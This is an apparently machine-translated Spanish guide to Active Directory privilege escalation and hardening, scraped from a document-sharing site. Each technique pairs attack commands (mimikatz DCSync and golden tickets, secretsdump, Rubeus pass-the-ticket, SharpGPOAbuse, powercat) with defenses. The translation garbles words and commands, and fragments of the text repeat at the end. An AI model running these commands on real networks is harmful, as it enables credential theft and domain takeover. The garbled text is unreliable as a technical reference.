Active Directory PDF

Machine Translated by Google
Directorio Activo
Escalada de privilegios
Guía de endurecimiento
CONTENIDO
Por qué es importante el anuncio 1
3
Escalada de privilegios en el anuncio
Ladrón de credenciales 8
Pwn público 10
se filtró en la cocina 12
DCSync 13
Abuso de AD CS 15
LLMNR Envenenamiento 17
Movimiento lateral 19
Asado AS-REP 21
Forzar cambio de contraseña 23
Escritura genérica 23
Pulverización de contraseñas 23
RunForPrivilegeEsc.exe 23
Pase el ataque del boleto 23
Abuso de GPO vulnerable 23
Abusar de la base de datos del servicio MSSQL 23
Abuso de confianzas de dominio 23
Para cualquier consulta, comuníquese con secur ity@hades s .io HADESS

Directorio Activo
POR QUÉ YADIS
IMPORTANTE

Directorio Activo
"AC TIVEDIRECTORYISCENT RAL TO TO L
DE LOS PASOS DE LA CYBERKILL
CADENA . TOPERPET UAT E UN ATAQUE ,
EN TAC KERS NECESITA ROBAR
CREDENCIALES O C OMP R OMI SE AN
CUENTA CON MALWAR E , ENTONCES
ES CALAT EPRIVILEGIOS QUE TIENEN
AC CESTO AL DE LOS RECURSOS QUE ELLOS
"
NECESIDAD .

Directorio Activo
PRIVILEGIO
ESCALADA
EN ANUNCIO

Directorio Activo
DEFECTO VENTANAS VENTANAS VENTANAS VENTANAS
SEGURIDAD SERVIDOR SERVIDOR 2 0 1 2 R2 SERVIDOR 2 0 1 2 SERVIDOR 2 0 0 8 R2
GRUPO 2016
CUENTA
SÍ SÍ SÍ SÍ
OPERADORES
ADMINISTRADORES SÍ SÍ SÍ SÍ
RESPALDO
SÍ SÍ SÍ SÍ
OPERADORES
CERTIFICADO
S ERVICIO D COM SÍ SÍ SÍ SÍ
ACCESO
DOMINIO
SÍ SÍ SÍ SÍ
UN DMIN NS
DOMINIO
SÍ SÍ SÍ SÍ
CONTROLADORES
ENT ERPRI SE
SÍ SÍ SÍ SÍ
UN DMIN NS
ENT ERPRI SE
SÍ NO NO NO
ADMINISTRADORES CLAVE
SERVIDOR DE TERMINAL
SÍ SÍ SÍ SÍ
PIOJOS NERVIOS

Directorio Activo
Ladrón de credenciales
Aproveche las credenciales robadas para conectarse a servidores y

recopilar más credenciales. Los servidores que ejecutan aplicaciones
como Microsoft Exchange Client Access Servers (CAS), Microsoft
Exchange OWA, Microsoft SQL y Terminal Services (RDP) tienden a tener muchas c
memoria de usuarios autenticados recientemente (o servicios que probablemente tengan
derechos de administrador de dominio).
Ataques:
1. ./dumpcreds
Defensa:
No inicie sesión con credencial directamente en otros sistemas

Directorio Activo
Pwn público
Por ejemplo, explotar MS14-068 toma menos de 5 minutos y permite que un
atacante reescriba de manera efectiva un vale de autenticación Kerberos TGT
válido para convertirlo en administrador de dominio (y administrador de empresa). Como
se muestra en el gráfico anterior, esto es como tomar una contraseña de embarque
válida y, antes de abordar, escribir "piloto" en ella. Luego, mientras aborda el avión, lo
acompañan a la cabina y le preguntan si desea tomar un café antes de despegar.
Ataques:
1. ms14-068.py -u <nombre de usuario>@<nombre de dominio> -s <id de usuario> -d

<domainControlerAddr>
Defensa:
Asegúrese de que el proceso DCPromo incluya un paso de control de calidad del parche antes
ejecutando DCPromo que comprueba la instalación de KB3011780. Él
forma rápida y sencilla de realizar esta comprobación es con PowerShell: obtener

revisión 3011780
Además, implemente un proceso automatizado que garantice la aprobación
los parches críticos se aplican automáticamente si el sistema deja de funcionar.
cumplimiento.

Directorio Activo
Filtrado en ki t chen
Este método es el más simple ya que no se requiere ninguna herramienta especial de "hackeo".
Todo lo que el atacante tiene que hacer es abrir el Explorador de Windows y buscar el
dominio SYSVOL DFS recurso compartido para archivos XML. La mayor parte del tiempo, el
Los siguientes archivos XML contendrán credenciales: groups.xml,

tareasprogramadas.xml y Servicios.xml.
Ataques:
1. \Get-GPPPassword.ps1 2. .
\Get-Decryptedpassword 'cpassword'
Defensa:
Instale KB2962486 en cada computadora utilizada para administrar GPO que
evita que se coloquen nuevas credenciales en la directiva de grupo

Preferencias.
Elimine los archivos xml de GPP existentes en SYSVOL que contengan contraseñas.
No ponga contraseñas en archivos a los que todos puedan acceder

usuarios autenticados.

Directorio Activo
D CSync
Un ataque DCSync usa comandos en el Protocolo remoto del servicio de replicación
de directorios de Microsoft (MS-DRSR) para simular ser un controlador de dominio
(DC) para obtener las credenciales de usuario de otro DC.
DCSync requiere una cuenta de usuario comprometida con privilegios de
replicación de dominio. Una vez que se establece, uno puede encontrar un controlador
de dominio, decirle que se replique y obtener hash de contraseña de su respuesta
posterior.
DCSync es una capacidad de la herramienta Mimikatz.
Ataques:
Invocar-Mimikatz -Command '"lsadump::dcsync /user:dcorp\krbtgt"'

o
secretsdump.py -just-dc <usuario>:<contraseña>@<dirección IP>
Defensa:
Para hacer que los ataques DCSync sean más difíciles, asegúrese de controlar cuidadosamente el
siguientes privilegios en AD:
Replicación de cambios de directorio
Replicar todos los cambios de directorio
Replicación de cambios de directorio en conjunto filtrado

Machine Translated by Google Directorio Activo
Autobús AD CS A
Cuando se emite un certificado basado en autenticación para una identidad, el
certificado se puede usar para autenticar como la identidad establecida en el nombre
alternativo del sujeto (SAN); este suele ser un nombre UPN o DNS.
Luego, el certificado se usa en lugar de una contraseña para la

autenticación.
Una vez que se ha emitido un certificado basado en la autenticación, se puede
utilizado para autenticar como sujeto hasta que se revoque o caduque. Esto eludirá
los planes de respuesta a incidentes que se basan en estrategias como restablecer la
contraseña del usuario para expulsar a un atacante; el atacante puede tener acceso
persistente a la cuenta a menos que los certificados también sean

revocado
Ataques:
1, .\PSPKIAudit.psm1 2.
Certify.exe encuentra [/ca:SERVER\ca-name | /dominio:dominio.local | /
ruta:CN=Configuración,DC=dominio,DC=local] [/quiet]
3. Rubeus.exe asktgt /usuario:X /certificado:C:\Temp\cert.pfx /contraseña:
<CONTRASEÑA_CERT>
Defensa:
Dado que las defensas para estos ataques son múltiples, en este punto
recomendamos que los defensores estudien los ataques, lean la extensa sección
"Orientación defensiva" del documento técnico y consulten la documentación de
seguridad de PKI de Microsoft. Los defensores también pueden probar las
configuraciones incorrectas de la función Invoke-PKIAudit de PSPKIAudit.

L LMN R Envenenamiento
Envenenamiento LLMNR o envenenamiento de resolución de nombre de multidifusión local de enlace
es un ataque muy utilizado cuando se trata de ejecutar un
prueba de penetración contra una red local. LLMNR y NBT-NS (NetBIOS
Servicio de nombres) van de la mano ya que pueden ser realizados por la misma
herramienta. El protocolo de resolución de nombres de multidifusión de enlace local

se basa en DNS y permite que los hosts resuelvan otros nombres de host en
el mismo enlace local.
Ataques:
1.nmap -Pn -n -p 139,445 --script smb-enum-shares.nse 10.10.10.10
2.respondedor
3.smbclient //10.10.10.10/share
Defensa:
LLMNR se puede desactivar a través del editor de políticas de grupo, en el menú
"configuración de políticas" en Política de computadora local -> Configuración de la
computadora -> Plantillas administrativas -> Red -> Cliente DNS.

AS -REP Asado
AS-REP Roasting es un ataque contra Kerberos para cuentas de usuario que
no requieren autenticación previa. La autenticación previa es el primer paso en
Autenticación Kerberos y está diseñado para evitar la fuerza bruta
ataques de adivinación de contraseñas
Ataques:
1.Rebeus.exe como reproche

2.Juan
Defensa:
Las protecciones obvias de este tipo de ataque son encontrar y eliminar
cualquier instancia de cuenta de usuario que esté configurada para no requerir la
autenticación previa de Kerberos.

Para ceChangePas espada

Si tenemos ExtendedRight en el objeto User-Force-Change-Password
tipo, podemos restablecer la contraseña del usuario sin saber su actual
clave
Ataques:
1.. .\PowerView.ps1
2.Establecer contraseña de usuario de dominio -Usuario de identidad -Detallado
Defensa:
Se recomienda realizar auditorías periódicas para verificar las delegaciones
y los permisos de grupo en grupos anidados.

Directorio Activo
G ener i cWr i te
Si tiene privilegios GenericWrite en un objeto de computadora, puede extraer
Delegación restringida basada en recursos de Kerberos: objeto de equipo

tomar el control.
Ataques:
$pass = ConvertTo-SecureString 'Password123#' -AsPlainText -Force $creds =
New-Object System.Management.Automation.PSCredential('DOMAIN\MASTER
USER'), $pass)
Set-DomainObject -Credential $creds USER1 -Clear
serviceprincipalname Set-DomainObject -Credential $creds
-Identity USER1 -SET @{serviceprincipalname='none/ fluu'}
.\Rubeus.exe kerberoast /dominio:<DOMINIO>
Defensa:
Elimine el cifrado RC4 a través de la política de grupo. Aplicar esto a ambos Dominio
Controladores, servidores miembro y clientes de Windows 10.

Directorio Activo
Pas espada Pulverización

Capaz de obtener acceso al host de la red interna usando las credenciales
Ataques:
1.crackmapexec winrm ips -u usuarios -p pasar
Defensa:
Deshabilite los servicios de autenticación no deseados como WinRM y también restrinja
conexión de escritorio remoto no autorizada con las instancias privadas

Directorio Activo
RunForPr ivilegeE sc .exe

Había un ejecutable poco común ejecutándose como SYSTEM en el
máquina que luego fue invertida y analizada y manipulada para

nuestros beneficios
Ataques:
1.dnEspía
Defensa:
Evite el uso de aplicaciones codificadas no seguras con altos privilegios

Pase el ataque de boletos

Los ataques Pass-the-Ticket apuntan a Kerberos de la misma manera que
Ataques Golden Ticket y Silver Ticket, ambos explotan
debilidades irreparables en el protocolo de autenticación.
Ataques:
1..\Rubeus.exe asktgt /usuario:<USET>$ /rc4:<NTLM HASH> /ptt 2.klist
Defensa:
Al detectar un ataque Pass-the-Ticket, su respuesta depende del nivel de

acceso proporcionado por el ataque. Si la cuenta comprometida de la que se
robó el TGT o el ticket de servicio era una cuenta de privilegios bajos con
permisos limitados o sin permisos fuera del sistema comprometido, la
mitigación podría ser tan simple como restablecer la contraseña de Active
Directory del usuario. Eso invalidaría el TGT robado o los boletos de servicio y
evitaría que el atacante genere nuevos boletos usando
el hash de la contraseña robada.

Directorio Activo
Un bus ing Vulnerable G PO

Las políticas de grupo son parte de cada Active Directory. GP está diseñado para ser
capaz de cambiar las configuraciones de cada sistema, desde la lista hasta la mayoría
capa privilegiada. Ya que es tan fundamental en la red
proceso de administración, también es muy poderoso para que los atacantes lo usen como un
vector de ataque
Ataques:
1..\SharpGPOAbuse.exe --AddComputerTask --Nombre de tarea "Actualizar" -- Autor
DOMINIO\<USUARIO> --Comando "cmd.exe" --Argumentos "/c usuario de red Contraseña
de administrador!@# / dominio" -- GPOName "ADICIONAL

CONFIGURACIÓN CC"
Defensa:
Los atacantes utilizan técnicas de mapeo de redes de mapeo como primer paso
de su ataque, pero esta misma técnica también se puede utilizar para
mitigación. Debe conocer y reevaluar quién tiene acceso a sus GPO.
El uso de herramientas gratuitas, como BloodHound, puede ayudarlo a comprender
quién tiene acceso a un GPO y quién hereda y accede. Le ayudará a detectar posibles
rutas de movimiento lateral y reevaluar si su estado actual está respondiendo a un
método de "lista de privilegios".

Directorio Activo
Un servicio de bus MS SQL

base de datos
MS SQL Server es ampliamente utilizado en redes empresariales. Debido a su uso por
parte de aplicaciones de terceros, compatibilidad con aplicaciones heredadas y uso
como base de datos, SQL Server es un tesoro oculto para los atacantes. Se integra muy
bien en un entorno de directorio activo, lo que lo convierte en un objetivo atractivo para
el abuso de funciones y privilegios.
Ataques:
1.PowerUPSQL.ps1
2.Get-SQLInstanceLocal -Detallado
3.(Get-SQLServerLinkCrawl -Detallado -Instancia "10.10.10.20" -Consulta
'select * from master..sysservers').customquery Import-Module .\powercat.ps1
powercat -l -v -p 443 -t 10000
Defensa:
Puede utilizar la configuración de la base de datos TRUSTWORTHY para indicar si
la instancia de Microso SQL Server confía en la base de datos y el
contenidos dentro de la base de datos. De forma predeterminada, esta configuración está desactivada.
Sin embargo, puede establecerlo en ON mediante la instrucción ALTER
DATABASE. Le recomiendo que deje esta configuración en APAGADO para
mitigar ciertas amenazas que pueden estar presentes cuando una base de datos está
adjunto al servidor

Fideicomisos de dominio de busing
En un nivel alto, una confianza de dominio establece la capacidad de los usuarios de
un dominio para autenticarse en los recursos o actuar como una entidad de seguridad
en otro dominio, una confianza lo que hace es vincular los sistemas de autenticación de
dos dominios y permite que el tráfico de autenticación fluya entre ellos
a través de un sistema de referencias. Si un usuario solicita acceso a un nombre
principal de servicio (SPN) de un recurso que reside fuera del dominio en el que se
encuentra actualmente, su controlador de dominio devolverá un ticket de referencia
especial que apunta al centro de distribución de claves (KDC, en Windows). caso del
controlador de dominio) del dominio extranjero.
Ataques:
1.mimikatz # lsadump::dcsync /user:<USUARIO> 2.mimikatz #
kerberos::golden /user:<USUARIO> /domain:</DOMAIN> /sid:<OBJECT SECURITY
ID> /rce:<NTLM HASH> /id:<ID DE USUARIO>
Defensa:
Eliminar los derechos de administrador local de los usuarios con privilegios bajos en el dominio,
deshabilite el servicio winrm si no es necesario y si el servicio es necesario,
bloquear enclaves críticos con cuentas separadas de WinRM y
permisos


Active Directory PDF

Cargado por

Información del documento

Descripción original:

Título original

Derechos de autor

Formatos disponibles

Compartir este documento

Compartir o incrustar documentos

Opciones para compartir

¿Le pareció útil este documento?

¿Este contenido es inapropiado?

Copyright:

Formatos disponibles

Active Directory PDF

Cargado por

Copyright:

Formatos disponibles

Machine Translated by Google

Forzar cambio de contraseña 23

Pase el ataque del boleto 23

Abuso de GPO vulnerable 23

Abusar de la base de datos del servicio MSSQL 23

Abuso de confianzas de dominio 23

Para cualquier consulta, comuníquese con secur ity@hades s .io HADESS

POR QUÉ YADIS

Para cualquier consulta, comuníquese con secur ity@hades s .io HADESS

"AC TIVEDIRECTORYISCENT RAL TO TO L

DE LOS PASOS DE LA CYBERKILL

CADENA . TOPERPET UAT E UN ATAQUE ,

EN TAC KERS NECESITA ROBAR

CREDENCIALES O C OMP R OMI SE AN

CUENTA CON MALWAR E , ENTONCES

ES CALAT EPRIVILEGIOS QUE TIENEN

AC CESTO AL DE LOS RECURSOS QUE ELLOS

Para cualquier consulta, comuníquese con secur ity@hades s .io HADESS

Para cualquier consulta, comuníquese con secur ity@hades s .io HADESS

DEFECTO VENTANAS VENTANAS VENTANAS VENTANAS

SEGURIDAD SERVIDOR SERVIDOR 2 0 1 2 R2 SERVIDOR 2 0 1 2 SERVIDOR 2 0 0 8 R2

Para cualquier consulta, comuníquese con secur ity@hades s .io HADESS

Aproveche las credenciales robadas para conectarse a servidores y

derechos de administrador de dominio).

Para cualquier consulta, comuníquese con secur ity@hades s .io HADESS

Por ejemplo, explotar MS14-068 toma menos de 5 minutos y permite que un

atacante reescriba de manera efectiva un vale de autenticación Kerberos TGT

válido para convertirlo en administrador de dominio (y administrador de empresa). Como

se muestra en el gráfico anterior, esto es como tomar una contraseña de embarque

acompañan a la cabina y le preguntan si desea tomar un café antes de despegar.

1. ms14-068.py -u <nombre de usuario>@<nombre de dominio> -s <id de usuario> -d

ejecutando DCPromo que comprueba la instalación de KB3011780. Él

forma rápida y sencilla de realizar esta comprobación es con PowerShell: obtener

Además, implemente un proceso automatizado que garantice la aprobación

los parches críticos se aplican automáticamente si el sistema deja de funcionar.

Para cualquier consulta, comuníquese con secur ity@hades s .io HADESS

Los siguientes archivos XML contendrán credenciales: groups.xml,

Instale KB2962486 en cada computadora utilizada para administrar GPO que

evita que se coloquen nuevas credenciales en la directiva de grupo

No ponga contraseñas en archivos a los que todos puedan acceder

Para cualquier consulta, comuníquese con secur ity@hades s .io HADESS

Un ataque DCSync usa comandos en el Protocolo remoto del servicio de replicación

de directorios de Microsoft (MS-DRSR) para simular ser un controlador de dominio

(DC) para obtener las credenciales de usuario de otro DC.

DCSync requiere una cuenta de usuario comprometida con privilegios de

de dominio, decirle que se replique y obtener hash de contraseña de su respuesta

DCSync es una capacidad de la herramienta Mimikatz.

Invocar-Mimikatz -Command '"lsadump::dcsync /user:dcorp\krbtgt"'

secretsdump.py -just-dc <usuario>:<contraseña>@<dirección IP>

siguientes privilegios en AD:

Replicación de cambios de directorio

Replicar todos los cambios de directorio

Replicación de cambios de directorio en conjunto filtrado

Para cualquier consulta, comuníquese con secur ity@hades s .io HADESS

Cuando se emite un certificado basado en autenticación para una identidad, el

certificado se puede usar para autenticar como la identidad establecida en el nombre

Luego, el certificado se usa en lugar de una contraseña para la

Una vez que se ha emitido un certificado basado en la autenticación, se puede

los planes de respuesta a incidentes que se basan en estrategias como restablecer la

persistente a la cuenta a menos que los certificados también sean

Certify.exe encuentra [/ca:SERVER\ca-name | /dominio:dominio.local | /

3. Rubeus.exe asktgt /usuario:X /certificado:C:\Temp\cert.pfx /contraseña: